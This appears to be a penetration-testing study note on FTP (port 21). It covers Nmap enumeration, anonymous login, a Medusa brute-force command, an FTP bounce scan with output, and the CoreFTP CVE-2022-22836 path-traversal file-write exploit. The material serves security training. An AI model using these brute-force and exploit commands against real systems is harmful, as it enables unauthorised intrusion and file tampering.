☑️FTP - 21
Enumeration
Nmap default scripts -sC includes the ftp-anon Nmap script which checks if a FTP server allows anonymous logins. The version enumeration flag -sV provides interesting information about FTP services, such as the FTP banner, which often includes the version name.
Interaction: We can use the ftp client or nc to interact with the FTP service. By default, FTP runs on TCP port 21.
sudo nmap -sC -sV -p 21 192.168.2.142Misconfiguration: (anonymous login) to do that use username anonymous and leave the password blank. If there is a web server available we can upload a shell and execute it.
Atttacks
Brute-Force
If anonymous login isnt enabled we can try brute forcing. We can use Medusa with options -u for a single username, -U for a username list, -P for a password list, -M for the protocol.
Note: Although we may find services vulnerable to brute force, most applications today prevent these types of attacks. A more effective method is Password Spraying.
medusa -u fiona -P /usr/share/wordlists/rockyou.txt -h 10.129.203.7 -M ftpFTP Bounce Attack
An FTP bounce attack is a network attack that uses FTP servers to deliver outbound traffic to another device on the network. The attacker uses a PORT command to trick the FTP connection into running commands and getting information from a device other than the intended server.
The Nmap -b flag can be used to perform an FTP bounce attack: (scanning 172.17.0.2)
anonmak9@htb[/htb]$ nmap -Pn -v -n -p80 -b anonymous:[email protected] 172.17.0.2
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-27 04:55 EDT
Resolved FTP bounce attack proxy to 10.10.110.213 (10.10.110.213).
Attempting connection to ftp://anonymous:[email protected]:21
Connected:220 (vsFTPd 3.0.3)
Login credentials accepted by FTP server!
Initiating Bounce Scan at 04:55
FTP command misalignment detected ... correcting.
Completed Bounce Scan at 04:55, 0.54s elapsed (1 total ports)
Nmap scan report for 172.17.0.2
Host is up.
PORT STATE SERVICE
80/tcp open http
<SNIP>Modern FTP servers include protections that, by default, prevent this type of attack, but if these features are misconfigured in modern-day FTP servers, the server can become vulnerable to an FTP Bounce attack.
Latest Vulnerabilities
CoreFTP before build 727 vulnerability assigned CVE-2022-22836. This vulnerability is for an FTP service that does not correctly process the HTTP PUT request and leads to an authenticated directory/path traversal, and arbitrary file write vulnerability.
This vulnerability allows us to write files outside the directory to which the service has access.
The Concept of the Attack
This FTP service uses an HTTP POST request to upload files. However, the CoreFTP service allows an HTTP PUT request, which we can use to write content to files. The exploit is simple:
We create a raw HTTP PUT request (-X PUT) with basic auth (--basic -u <username>:<password>), the path for the file (--path-as-is https://<IP>/../../../../../whoops), and its content (--data-binary "PoC.") with this command. Additionally, we specify the host header (-H "Host: <IP>") with the IP address of our target system.
In short, the actual process misinterprets the user's input of the path. This leads to access to the restricted folder being bypassed. As a result, the write permissions on the HTTP PUT request are not adequately controlled, which leads to us being able to create the files we want outside of the authorized folders. However, we will skip the explanation of the Basic Auth process and jump directly to the first part of the exploit.
Directory Traversal
Step
Directory Traversal
Concept of Attacks - Category
1.
The user specifies the type of HTTP request with the file's content, including escaping characters to break out of the restricted area.
Source
2.
The changed type of HTTP request, file contents, and path entered by the user are taken over and processed by the process.
Process
3.
The application checks whether the user is authorized to be in the specified path. Since the restrictions only apply to a specific folder, all permissions granted to it are bypassed as it breaks out of that folder using the directory traversal.
Privileges
4.
The destination is another process that has the task of writing the specified contents of the user on the local system.
Destination
Up to this point, we have bypassed the constraints imposed by the application using the escape characters (../../../../) and come to the second part, where the process writes the contents we specify to a file of our choice. This is when the cycle starts all over again, but this time to write contents to the target system.
Arbitrary File Write
Step
Arbitrary File Write
Concept of Attacks - Category
5.
The same information that the user entered is used as the source. In this case, the filename (whoops) and the contents (--data-binary "PoC.").
Source
6.
The process takes the specified information and proceeds to write the desired content to the specified file.
Process
7.
Since all restrictions were bypassed during the directory traversal vulnerability, the service approves writing the contents to the specified file.
Privileges
8.
The filename specified by the user (whoops) with the desired content ("PoC.") now serves as the destination on the local system.
Destination
After the task has been completed, we will be able to find this file with the corresponding contents on the target system.
Last updated